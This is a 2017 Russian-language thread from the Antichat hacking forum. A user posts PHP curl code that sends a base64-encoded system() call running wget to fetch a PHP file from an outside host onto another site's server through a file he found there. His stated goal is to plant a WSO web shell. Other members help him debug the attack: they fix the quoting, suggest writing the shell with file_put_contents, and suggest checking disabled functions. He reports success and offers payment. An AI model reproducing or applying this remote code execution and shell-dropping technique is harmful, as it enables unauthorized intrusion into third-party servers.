Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Отправка файла пост запросом (https://forum.antichat.xyz/showthread.php?t=456200)

tagnohilori 27.09.2017 19:49
Добрый день , нашёл один сайт на котором лежит файл с таким содержимым:

.SpoilerTarget" type="button">Spoiler: Code1

Я создал на своём сервере файл .php и загрузил в него форму curl с отправкой файла:

.SpoilerTarget" type="button">Spoiler: Code2
ass');

$codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

$postdata ="fack=". urlencode(base64_encode($codec));

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

$res = curl_exec($ch);

curl_close($ch);?>

Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.

Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz

Главная задача залить wso через файлик code1

artkar 27.09.2017 20:53
Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...

tagnohilori 27.09.2017 21:32
Цитата:
Сообщение от artkar
artkar said:

Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/
https://ovrload.ru/f/*****.php
");
после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...
Поставил кавычки получаю ошибку 500

artkar 27.09.2017 22:45
а почему у тебя пост? Нужно ведь гет?

И попробуй скопировать в папку /logs

blackbox 27.09.2017 23:23
Цитата:
Сообщение от tagnohilori
tagnohilori said:

Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.
Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz
Главная задача залить wso через файлик code1
Во-первых url должен быть '

Код:
Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'
;

Во-вторых, строка запроса должна быть в таком виде:

Код:
Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'
, то есть как правильно уже сказал в кавычках. Если system не работает (возможно она отключена), то можно попробовать напрямую записать вебшелл через, например, file_put_contents. И да, нужно проверить есть ли права на запись в нужной папке, так же через php все это можно сделать.

tagnohilori 28.09.2017 00:21
Цитата:
Сообщение от blackbox
blackbox said:

Во-первых url должен быть '
Код:
Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'
;
Во-вторых, строка запроса должна быть в таком виде:
Код:
Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'
, то есть как правильно уже сказал в кавычках. Если system не работает (возможно она отключена), то можно попробовать напрямую записать вебшелл через, например, file_put_contents. И да, нужно проверить есть ли права на запись в нужной папке, так же через php все это можно сделать.
Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается

blackbox 28.09.2017 00:29
Цитата:
Сообщение от tagnohilori
tagnohilori said:

Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается
Нужно посмотреть, не отключена ли функция system:

Код:
Code:
$codec = 'есho ini_get("disable_functions");'
И в коде отсылки запроса добавить вывод:

Код:
Code:
$res = curl_exec($ch);
echo $res;

tagnohilori 28.09.2017 00:47
Цитата:
Сообщение от blackbox
blackbox said:

Нужно посмотреть, не отключена ли функция system:
Код:
Code:
$codec = 'есho ini_get("disable_functions");'
И в коде отсылки запроса добавить вывод:
Код:
Code:
$res = curl_exec($ch);
echo $res;
Просто пустой экран , у тебя есть телеграмм ? Или скайп

Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,

Твой ответ мне помог напиши свой wmz в лс

blackbox 28.09.2017 01:08
Цитата:
Сообщение от tagnohilori
tagnohilori said:

Просто пустой экран , у тебя есть телеграмм ? Или скайп
Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,
Твой ответ мне помог напиши свой wmz в лс
Рад что помог, wmz оставь себе на мороженое.

tagnohilori 28.09.2017 01:29
Цитата:
Сообщение от blackbox
blackbox said:

Рад что помог, wmz оставь себе на мороженное.
Спасибо , доброго вам вечера )


Время: 04:02